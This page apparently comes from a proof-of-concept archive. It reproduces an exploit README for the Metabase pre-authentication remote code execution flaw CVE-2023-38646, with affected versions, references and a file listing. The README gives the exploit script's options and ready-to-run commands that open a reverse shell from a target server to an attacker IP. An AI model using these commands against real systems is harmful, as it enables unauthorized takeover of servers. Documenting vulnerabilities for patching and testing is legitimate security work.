POC详情: 81ff93ad1fe59d20b0ebf1093f7b0a3d3ac48baf

来源
关联漏洞
标题: Metabase 安全漏洞 (CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
描述
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
介绍
# CVE-2023-38646 Metabase Pre-Auth RCE (11/26/2023)
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

The vulnerability exists within the application exposing the **setup-token** that can be use to validate the database within the **api/setup/validate**. Unauthorized user can create a malicious code and execute arbitratry command.

## Disclaimer

**USE AT YOUR OWN RISK**

This script is provided for educational and testing purposes. The author is not responsible for any misuse or damage caused by its use. Ensure compliance with applicable laws and ethical standards. By using this script, you acknowledge and accept these terms.

## Metabase
Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. It’s a popular project, with over 33k stars on GitHub and has had quite a lot of scrutiny from a vulnerability research perspective in the last few years.

## Proof of Concept

### Commands
```
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            show this help message and exit
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Hostname of the target.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port of the Target Machine (default: Port 80)
  -p PORT, --port PORT  Port for reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Your IP Adress
```
You can run the script by using this command below. You can change the remote port by using the -rp. Default port is 80
```
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
```
```
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
```

![image](https://github.com/Ego1stoo/CVE-2023-38646/assets/53305928/e6fa3975-d67d-434a-9386-30e35c0e787b)

## Vulnerable Versions
```
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2
```

## References
- [Packet storm security Metabase-Remote-Code-Execution](https://packetstormsecurity.com/files/174091/Metabase-Remote-Code-Execution.html)
- [NVD CVE-2023-38646 Details](https://nvd.nist.gov/vuln/detail/CVE-2023-38646)
文件快照

[4.0K] /data/pocs/81ff93ad1fe59d20b0ebf1093f7b0a3d3ac48baf ├── [2.4K] CVE-2023-38646.py └── [2.7K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。